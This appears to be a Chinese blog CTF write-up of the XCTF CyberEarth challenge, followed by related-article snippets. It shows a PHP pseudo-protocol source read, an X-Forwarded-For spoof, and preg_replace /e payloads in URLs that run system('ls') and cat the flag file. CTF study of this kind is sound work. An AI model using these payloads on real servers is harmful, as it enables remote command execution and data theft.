php 写入文件 ctf,[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)

最新推荐文章于 2024-07-13 15:12:45 发布
最新推荐文章于 2024-07-13 15:12:45 发布
阅读量1k 收藏 1
点赞数 1
文章标签: php 写入文件 ctf

原作者:admin

[原理]

文件包含读源码、x-forwarded-for

preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。

[目的]

掌握正则表达式、伪协议读取源码

[环境]

windows

[工具]

firefox、burp

[步骤]

1.进入云平台设备维护中心页面,利用PHP伪协议读取源码。

2.将得到的源码进行base64解密处理,获取到index.PHP的源码,在121行可以发现后门,如图所示。

6d2364936d3d54adbcdf075703d764ab.png

3.对此段代码进行审计,可以发现需要将X_FORWARDED_FOR设置为127.0.0.1,并且用get方式传递三个参数传递给preg_replace函数。

这里介绍一下preg_replace函数:

bd7c87094629ed024d5559e1f7c28f85.png

其实就是PHP里的正则表达式,这里的正则匹配我需要单独写一篇关于正则的博客。等待后续吧....

4.使用burp修改http请求头参数,添加X_FORWARDED_FOR,将url设置为

/index.PHP?pat=/(.*)/e&rep=system(‘ls‘)&sub=aa 可以查看文件列表,如图所示。

63f11587a7e84da5962c40709b7a1886.png

5.将url设置为 /index.PHP?pat=/(.*)/e&rep=system(‘ls+s3chahahaDir‘)&sub=aa 查看s3chahahaDir文件夹,发现flag文件夹。

6.将url设置为 /index.PHP?pat=/(.*)/e&rep=system(‘ls+s3chahahaDir/flag‘)&sub=aa 查看flag文件夹,发现flag.PHP文件。

7.将url设置为 /index.PHP?pat=/(.*)/e&rep=system(‘cat+s3chahahaDir/flag/flag.PHP‘)&sub=aa 查看flag,如图所示。

ad2f7bc9bdacac0e974656a81cb0bd88.png

长安的雨
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 file_include 解题详析(php伪协议+convert转换过滤器)
等风来
07-31 4908
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该题涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?题目描述:怎么读取文件呢?对于本题,将初始POC。
PHP CTF常见考题的绕过技巧
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
CTFPHP
SingWeek
07-26 2685
CTFPHPPHP环境及基础变量PHP漏洞函数1、sha1 和 md5 函数2、ereg()函数漏洞:00截断2、变量本身的key4、extract()变量覆盖5、strcmp()漏洞6、is_numeric()函数7、preg_match函数漏洞8、parse_str函数漏洞9、字符串比较10、unset()函数漏洞11、intval()函数漏洞12、switch()函数13、in_array()函数14、serialize() 和 unserialize()函数漏洞 PHP环境及基础 使用phpstu
CTF文件包含篇 与 php文件包含
2301_81556781的博客
07-13 719
phpMyAdmin是开源的MYSQL数据库管理工具 4.8.0~4.8.1index.php界面存在文件包含功能,代码分析进行绕过可实现漏洞利用。
PHP大法好(CTF
qq_22192367的博客
03-18 1208
题目链接:http://ctf5.shiyanbar.com/DUTCTF/index.php 打开后获得如下页面;是一些小提示;直接看最后,访问index.php.txt 首先id匹配“hackerDJ”如果匹配则不允许访问;之后对id进行url解码,解码后判断是否等于hackerDJ,是则输出flag,那么就要绕过第一次判断,所以要进行两次url编码hackerDJ->%68%6...
php ctf题解,[极客大挑战 2019]PHP CTF题解与分析
weixin_33999969的博客
03-11 584
知识点php序列化与反序列化序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等反序列化:函数为unserialize(),将字符串转换成变量或对象的过程常用的魔术方法:__construct():创建对象时初始化,当一个对象创建时被调用__wakeup() 使用unserialize时触发__sleep() 使用serialize时触发__...
CTF php 序列化,CTF-WEB: php反序列化
weixin_31887861的博客
03-18 164
将 c2hpZWxkLmpwZw== base64解码为shield.jpg将index.php 进行base64编码为aW5kZXgucGhw,进行访问读取源码http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw右键打开查看源码:...
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1698
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTF—Web—文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
CTF-HTTP-PHP封装协议上传木马及远程命令执行
最新发布
07-31
CTF-HTTP_PHP封装协议上传木马及远程命令执行
ctf.show web3 文件包含+php伪协议+命令执行
m0_46412682的博客
07-12 2272
ctf.show web3 php伪协议+文件包含+命令执行 题目的提示: 一开始的页面: 看到这个语句,那就是文件包含了,先试下file:////etc/passwd,有反应 试下有没有flag.txt文件,好像没有这个文件 那现在我们利用php伪协议 php://input post提交命令,这里不知道为什么我用hackerbar post提交没有反应,那只能burp抓包咯,利用命令执行 ls,查看当前有啥文件 这里出现了一个ctf_go_go_go,那我们用cat打开 flag{a1b1cd4e-
ctf中怎样获取php文件源码,ctf中关于php伪协议的考查
weixin_33483567的博客
03-09 1405
原创: Archerx ...
CTFPHP基础学习篇(一)
热门推荐
ioik~hk的博客
03-20 1万+
CTFPHP基础。 文章目录 前言 一、PHP是什么? 二、配置PHP环境 三、PHP基础语法介绍 前言 估摸着不少学计算机的同学以及其他专业的小部分同学都对于信息安全感兴趣吧!那对于参加这相关的比赛就应该更有兴趣了。那么我们首先就了解一下下这相关的比赛——CTF(Capture The Flag)。
CTFphp相关考点
meteox的博客
08-07 2425
以前在做CTF题的时候总是会遇到一些用php的trick才能过的题,知识点还是很杂的,主要是php这种动态弱类型语言实在是太灵活,各种奇葩写法也多,把之前的知识总结下。 学长的博客有对php黑魔法进行了一些总结,我在此基础上进行拓展 https://skysec.top/2017/07/22/PHP%E5%87%BD%E6%95%B0%E9%BB%91%E9%AD%94%E6%B3%95%E5%B0%8F%E6%80%BB%E7%BB%93/#%E9%BB%91%E9%AD%94%E6%B3%95%E5%A
ctf中常见php特性_php特性 ctf,花三分钟看完这篇文章你就懂了
m0_61331491的博客
04-07 1291
/ 用户登录成功} else {// 用户名或密码错误?上述示例中,应用程序在处理用户输入的用户名和密码时没有进行充分的验证和过滤。攻击者可以构造恶意的输入,例如在用户名字段中输入,从而修改SQL语句的逻辑**(**其中原代码在用户名字段中输入SELECT * FROM users WHERE username=’ ’ OR (‘1’=‘1’ AND password=‘$password’)**如果用户名为空,那么条件表达式为真。如果用户名不为空,那么会继续判断第二个条件。
2024年网络安全最全ctf中常见php特性_php特性 ctf(1),2024年最新【秋招面试专题解析
2401_84265571的博客
05-11 743
78. ## 二十一、解析HTML和XML作为PHP代码:当将用户提供的HTML或XML内容作为PHP代码进行解析时,如果不正确过滤和验证,可能会导致代码注入漏洞,允许执行恶意代码。70. ## 十七、动态函数调用:PHP允许使用变量来调用函数,但如果不正确验证和过滤用户提供的函数名,可能会导致执行未经授权的操作。72. ## 十八、动态类名实例化:PHP允许使用变量来实例化类,但如果不正确处理用户提供的类名,可能会导致执行未经授权的操作。参数,攻击者可以传递恶意的输入,可能导致意外的计算结果或安全问题。
ctfPHP千丝万缕的联系
UP's blog
01-10 1543
参考链接:<https://www.restran.net/2016/09/26/php-security-notes/>不得不说,大佬写的十分好
关于 CTFphp 考点与绕过那些事的总结
Welcome To Myon'Blog !
03-04 2979
_POST //获取post数据,是一个字典$_GET //获取get数据,是一个字典$_COOKIE //获取cookie数据$_SESSION //获取session数据$_FILES //获取上传的文件$_REQUEST //获取$_GET, $_POST, $_COOKIE中的数据$_SERVER //用户和服务器的基本信息数据库$_ENV //环境数据$GLOBALS //所有全局变量。
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 314
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
CTF-PHP常见考点实例小结
告白的博客
11-13 3773
0x00 CTF-PHP常见考点 1.php弱类型的比较 2.php断言问题 3.php读取文件 4.preg_match绕过 5.sha1()函数与md5() 6.异或注入绕过 7.updatexml()函数考点 8.命令执行绕过:https://www.cnblogs.com/iloveacm/p/13687654.html 9.源文件泄露 10.extract变量覆盖 11.strcmp漏洞 … 参考网上师傅的总结,感觉不错值得学习:https://www.cnblogs.com/iloveacm
PHP伪协议文件包含漏洞分析 - Zad的博客园实战
PHP文件包含漏洞通常发生在代码中使用了类似`include`或`require`等函数,它们可以动态地加载和执行文件。当这些函数的参数来自不受信任的源,比如用户输入时,攻击者可能通过构造特殊的输入来尝试包含服务器上的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值